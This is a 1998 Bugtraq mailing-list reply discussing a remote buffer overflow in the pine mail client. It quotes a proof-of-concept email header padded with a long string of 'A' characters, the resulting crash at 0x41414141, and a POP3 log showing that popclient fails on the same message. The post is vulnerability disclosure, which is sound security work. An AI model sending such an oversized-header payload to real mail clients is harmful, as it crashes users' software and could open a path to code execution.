Bugtraq mailing list archives

Re: another remote pine vunerability

From: prj () nls net (Phillip R. Jaenke)
Date: Thu, 18 Jun 1998 14:46:00 -0400


On Wed, 17 Jun 1998, Michal Zalewski wrote:

Recently I found silly remote overflow in pine. It's so simple there's no
need to describe it:

From: Michal Zalewski 
<lcamtuf@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
       From: Nemo <mnemonix () GLOBALNET CO UK>

AAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAA>

...and any attempt of reading this mail will cause:

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()


Also, attempting to so much as download *THIS* email I'm quoting here will
cause a panic in 'popclient.' pine is fine, but popclient can't retrieve
email past this message.

RETR 9

+OK 3897 octets.
(56 lines of message content)

DELE 1094795585

doPOP3: cleanUp: Bad file descriptor

The only way to get rid of the offending message is by hand. I'd say we've
stumbled on to something that could be rather painful.

--Phillip R. Jaenke (prj () nls net - InterNIC: PRJ5)
Head Geek, Linux@Comdex Project - http://comdex.linuxos.org/
TheGuyInCharge(tm), Ketyra Designs, Inc.
"For every step I take, I find somebody stepping on my heels." --anonymous
"That's IT! I'm gonna slap Dr.Watson with a malpractice suit!!" --Keihra
! I reserve the right to bill spammers for my time and disk space !

Current thread:

Bind 4.9.6 ~ Current | X86 Exploit System Administrator (Jun 16)
- <Possible follow-ups>
- Re: Bind 4.9.6 ~ Current | X86 Exploit Sebastian Schoenberg (Jun 17)
  - another remote pine vunerability Michal Zalewski (Jun 17)
    - Re: another remote pine vunerability Phillip R. Jaenke (Jun 18)
    - Re: another remote pine vunerability frank () sun01 ccii unipi it (Jun 18)
    - Re: another remote pine vunerability Olivier Crete (Jun 18)
    - Re: another remote pine vunerability Jason H. Reeves (Jun 18)
    - Re: another remote pine vunerability Joan Garcia i Silano (Jun 18)
  - Re: Bind 4.9.6 ~ Current | X86 Exploit Valentin Pavlov (Jun 18)